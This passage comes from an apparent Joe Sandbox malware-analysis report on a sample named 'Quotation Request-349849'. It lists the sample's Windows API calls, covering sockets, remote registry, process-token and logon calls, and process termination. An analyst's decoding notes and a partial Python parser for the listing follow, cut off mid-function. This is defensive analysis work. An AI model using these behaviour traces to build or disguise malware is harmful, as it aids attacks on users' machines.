                                                      • SysAllocString.OLEAUT32(00000000), ref: 0082DB57
                                                      • SysAllocString.OLEAUT32(?), ref: 0082DB75
                                                      • SysFreeString.OLEAUT32(?), ref: 0082DB7E
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0082DBA3
                                                      • SysAllocString.OLEAUT32(?), ref: 0082DBB1
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      APIs
                                                        • Part of subcall function 00847D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00847DB6
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008461C6
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008461D5
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0084620E
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00846217
                                                      • WSAGetLastError.WSOCK32 ref: 00846221
                                                      • closesocket.WSOCK32(00000000), ref: 0084624A
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00846263
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082DC09
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082DC2F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0082DC32
                                                      • SysAllocString.OLEAUT32 ref: 0082DC53
                                                      • SysFreeString.OLEAUT32 ref: 0082DC5C
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0082DC76
                                                      • SysAllocString.OLEAUT32(?), ref: 0082DC84
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      APIs
                                                        • Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
                                                        • Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
                                                        • Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00857632
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0085763F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0085764A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00857659
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00857665
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 007F9AE6
                                                        • Part of subcall function 007F3187: EncodePointer.KERNEL32(00000000), ref: 007F318A
                                                        • Part of subcall function 007F3187: __initp_misc_winsig.LIBCMT ref: 007F31A5
                                                        • Part of subcall function 007F3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007F9EA0
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007F9EB4
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007F9EC7
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007F9EDA
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007F9EED
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007F9F00
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 007F9F13
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007F9F26
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007F9F39
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007F9F4C
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007F9F5F
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007F9F72
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007F9F85
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007F9F98
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007F9FAB
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007F9FBE
                                                      • __mtinitlocks.LIBCMT ref: 007F9AEB
                                                      • __mtterm.LIBCMT ref: 007F9AF4
                                                        • Part of subcall function 007F9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007F9AF9,007F7CD0,0088A0B8,00000014), ref: 007F9C56
                                                        • Part of subcall function 007F9B5C: _free.LIBCMT ref: 007F9C5D
                                                        • Part of subcall function 007F9B5C: DeleteCriticalSection.KERNEL32(0088EC00,?,?,007F9AF9,007F7CD0,0088A0B8,00000014), ref: 007F9C7F
                                                      • __calloc_crt.LIBCMT ref: 007F9B19
                                                      • __initptd.LIBCMT ref: 007F9B3B
                                                      • GetCurrentThreadId.KERNEL32 ref: 007F9B42
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 3567560977-0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007F3F85), ref: 007F4085
                                                      • GetProcAddress.KERNEL32(00000000), ref: 007F408C
                                                      • EncodePointer.KERNEL32(00000000), ref: 007F4097
                                                      • DecodePointer.KERNEL32(007F3F85), ref: 007F40B2
                                                      Strings
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      APIs
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 00850E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0084FDAD,?,?), ref: 00850E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008502BD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008502FD
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00850320
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00850349
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0085038C
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00850399
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 008557FB
                                                      • GetMenuItemCount.USER32(00000000), ref: 00855832
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0085585A
                                                      • GetMenuItemID.USER32(?,?), ref: 008558C9
                                                      • GetSubMenu.USER32(?,?), ref: 008558D7
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00855928
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0082EF06
                                                      • VariantClear.OLEAUT32(00000013), ref: 0082EF78
                                                      • VariantClear.OLEAUT32(00000000), ref: 0082EFD3
                                                      • _memmove.LIBCMT ref: 0082EFFD
                                                      • VariantClear.OLEAUT32(?), ref: 0082F04A
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0082F078
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: af52c403f3513ca0c9fa0c87cd296821cdf7b37a4479622d9f57ef311faa94b8
                                                      • Instruction ID: e89e82bde79ec9a47b2504c1190000643356632855ce8320c355f894ca2b4a12
                                                      • Opcode Fuzzy Hash: af52c403f3513ca0c9fa0c87cd296821cdf7b37a4479622d9f57ef311faa94b8
                                                      • Instruction Fuzzy Hash: 5A516CB5A00219DFCB10DF58D884AAAB7F8FF4C314B158569EA49DB302E334E951CFA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832258
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008322A3
                                                      • IsMenu.USER32(00000000), ref: 008322C3
                                                      • CreatePopupMenu.USER32 ref: 008322F7
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00832355
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00832386
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: 761668f0e25565e96cb356657cf3196ef913a72aae257ad5bc8731d2c241b10f
                                                      • Instruction ID: 0c130f02b911f6016b8339f77d43f89fd1757559d97731336563f4e5466e6236
                                                      • Opcode Fuzzy Hash: 761668f0e25565e96cb356657cf3196ef913a72aae257ad5bc8731d2c241b10f
                                                      • Instruction Fuzzy Hash: 25519C70601209EBDF21DF68D888BAEBBF5FF85318F104169E851E72A1D3799944CB91
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 007D179A
                                                      • GetWindowRect.USER32(?,?), ref: 007D17FE
                                                      • ScreenToClient.USER32(?,?), ref: 007D181B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007D182C
                                                      • EndPaint.USER32(?,?), ref: 007D1876
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: a840d76267d14137f00142e1ad901c35ffd6607d05d4c240d39827bc4c60ac30
                                                      • Instruction ID: 3cb36c631489b3961a2544a2407ca7b09a8463ca99b6d12800f4d6f5231ffa3d
                                                      • Opcode Fuzzy Hash: a840d76267d14137f00142e1ad901c35ffd6607d05d4c240d39827bc4c60ac30
                                                      • Instruction Fuzzy Hash: F6417E30504700AFD711EF25CC84BAA7BF8FB59724F14467AFAA4872B2C7359845DB61
                                                      APIs
                                                      • ShowWindow.USER32(008957B0,00000000,01544C48,?,?,008957B0,?,0085B5A8,?,?), ref: 0085B712
                                                      • EnableWindow.USER32(00000000,00000000), ref: 0085B736
                                                      • ShowWindow.USER32(008957B0,00000000,01544C48,?,?,008957B0,?,0085B5A8,?,?), ref: 0085B796
                                                      • ShowWindow.USER32(00000000,00000004,?,0085B5A8,?,?), ref: 0085B7A8
                                                      • EnableWindow.USER32(00000000,00000001), ref: 0085B7CC
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0085B7EF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: d407ec2985903c13f34bc186cdce49a45b5451e1c3a41fe0937719a5efdbb334
                                                      • Instruction ID: a13e2a230507936268402e70aaac456cd14df5ada37ef36b84457a3787d7d755
                                                      • Opcode Fuzzy Hash: d407ec2985903c13f34bc186cdce49a45b5451e1c3a41fe0937719a5efdbb334
                                                      • Instruction Fuzzy Hash: C9416134600244AFDB26CF24C499B957BE1FF59312F1881B9FE48CF6A2C731A85ACB51
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00844E41,?,?,00000000,00000001), ref: 008470AC
                                                        • Part of subcall function 008439A0: GetWindowRect.USER32(?,?), ref: 008439B3
                                                      • GetDesktopWindow.USER32 ref: 008470D6
                                                      • GetWindowRect.USER32(00000000), ref: 008470DD
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0084710F
                                                        • Part of subcall function 00835244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008352BC
                                                      • GetCursorPos.USER32(?), ref: 0084713B
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00847199
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: b7eb86a3b33b02d788045a3c9c854ba50b02b511498e817e9e32ebe7693c7f7d
                                                      • Instruction ID: 8ba7b894243f6b519a4846f5304e7dc4948ffbe90678c1e2e25bb235b4fe882b
                                                      • Opcode Fuzzy Hash: b7eb86a3b33b02d788045a3c9c854ba50b02b511498e817e9e32ebe7693c7f7d
                                                      • Instruction Fuzzy Hash: 3A318172509309ABD720DF14D849A9BBBEAFB88314F000919F585E7192D775EA09CB92
                                                      APIs
                                                        • Part of subcall function 008280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008280C0
                                                        • Part of subcall function 008280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008280CA
                                                        • Part of subcall function 008280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008280D9
                                                        • Part of subcall function 008280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008280E0
                                                        • Part of subcall function 008280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008280F6
                                                      • GetLengthSid.ADVAPI32(?,00000000,0082842F), ref: 008288CA
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008288D6
                                                      • HeapAlloc.KERNEL32(00000000), ref: 008288DD
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 008288F6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0082842F), ref: 0082890A
                                                      • HeapFree.KERNEL32(00000000), ref: 00828911
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: b8d634d2cba916d8afbc1fe23f3f2e80e80a95e1b042f09b691e103c0fbafc47
                                                      • Instruction ID: d2e68d0617af4d8df37cc61664b3b5b1f6eda522b21c594ca7e1f77c8b1c2886
                                                      • Opcode Fuzzy Hash: b8d634d2cba916d8afbc1fe23f3f2e80e80a95e1b042f09b691e103c0fbafc47
                                                      • Instruction Fuzzy Hash: 9B11B171502619FFDF119FA4EC09BBE7BA8FB44316F148028E945D7211CB369D84DB60
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008285E2
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 008285E9
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008285F8
                                                      • CloseHandle.KERNEL32(00000004), ref: 00828603
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00828632
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00828646
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: 240221ce1924fc5bd29fcc5cc841d899a6108eaff637dbd7ebb4978efb611334
                                                      • Instruction ID: 23f8380029eaa72fb4b91fe366a15d5ddba310d5aba6110add42cafba7236fdc
                                                      • Opcode Fuzzy Hash: 240221ce1924fc5bd29fcc5cc841d899a6108eaff637dbd7ebb4978efb611334
                                                      • Instruction Fuzzy Hash: C71147B2501249EBDF018FA4ED49BDA7BA9FB08305F044064FE04A21A1C7769DA0AB60
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0082B7B5
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0082B7C6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0082B7CD
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0082B7D5
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0082B7EC
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0082B7FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 7375a8b9910f81fc7e5f4273e5c5f363e9030063f565d52856528e302d34cd65
                                                      • Instruction ID: e7e98290a870caf600e48fd53fa92c6ec26016f328a6cba7723ac18beea5911e
                                                      • Opcode Fuzzy Hash: 7375a8b9910f81fc7e5f4273e5c5f363e9030063f565d52856528e302d34cd65
                                                      • Instruction Fuzzy Hash: E9017175E00719BBEF109BA69C45A5ABFA8FB48311F004065FA04E7291D6309C00CF91
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F0193
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 007F019B
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007F01A6
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007F01B1
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 007F01B9
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 007F01C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 1b767aead68275efb369a0a3c06028964213043c77add43bd03a685e539eb7dc
                                                      • Instruction ID: 013104a061c85d5d0551f969749005f273b7dde5f8e45d9bef76f6aa3116bbdb
                                                      • Opcode Fuzzy Hash: 1b767aead68275efb369a0a3c06028964213043c77add43bd03a685e539eb7dc
                                                      • Instruction Fuzzy Hash: 6A016CB09017597DE3009F5A8C85B52FFE8FF19354F00411BA15C47942C7F5A864CBE5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008353F9
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0083540F
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0083541E
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083542D
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00835437
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083543E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 1e4bfb714c5c470d5dd6394b9daf59b32ee39e0cf56627e900a1f8d505b5c539
                                                      • Instruction ID: 246be81e3b57839c4139d461cccd961002565588b3c384754698aa394b324d10
                                                      • Opcode Fuzzy Hash: 1e4bfb714c5c470d5dd6394b9daf59b32ee39e0cf56627e900a1f8d505b5c539
                                                      • Instruction Fuzzy Hash: D4F01271141658BBE7215B52DC0DEEB7F7CFBD6B12F000169FB05D105296A51A0186B5
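The argument values in these listings are what Joe Sandbox captured from the stack at each call site: a "?" is a value it could not resolve, and the trailing arguments are usually leftover stack contents rather than real parameters (OpenProcess takes three arguments, not the sixteen shown). Reading them still pays off once the standard Win32 constants are decoded: the block immediately above posts WM_CLOSE (0x10) to a window, waits up to 500 ms (0x1F4) with SMTO_ABORTIFHUNG (0x2), then opens the owning process with PROCESS_ALL_ACCESS (0x1F0FFF) and terminates it, and the MapVirtualKeyW block further up resolves the scan codes for VK_LWIN, VK_SHIFT, VK_LSHIFT, VK_RSHIFT, VK_CONTROL and VK_MENU. The following Python is an added example for analysts, not code from the Joe Sandbox report or from the sample: it parses this listing format, annotates the constants seen in the blocks above, and checks for the close-then-terminate idiom. The constant tables and the WINDOW_KILL pattern are mine (only values that appear on this page are included); the sample lines are copied from the listing above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One "• Fn.MODULE(args), ref: ADDR" line, optionally prefixed with
# "Part of subcall function XXXXXXXX:". Parenthesised args may be absent.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<fn>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)


@dataclass
class ApiCall:
    fn: str
    module: str
    args: list              # int for a captured value, None for "?"
    ref: int                # address of the call site
    subcall: Optional[int]  # containing function when listed as "Part of subcall"


def parse_listing(text: str) -> list:
    """Parse the Joe Sandbox 'APIs' listing lines into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw or not raw.strip() else [
            None if a.strip() == "?" else int(a, 16) for a in raw.split(",")
        ]
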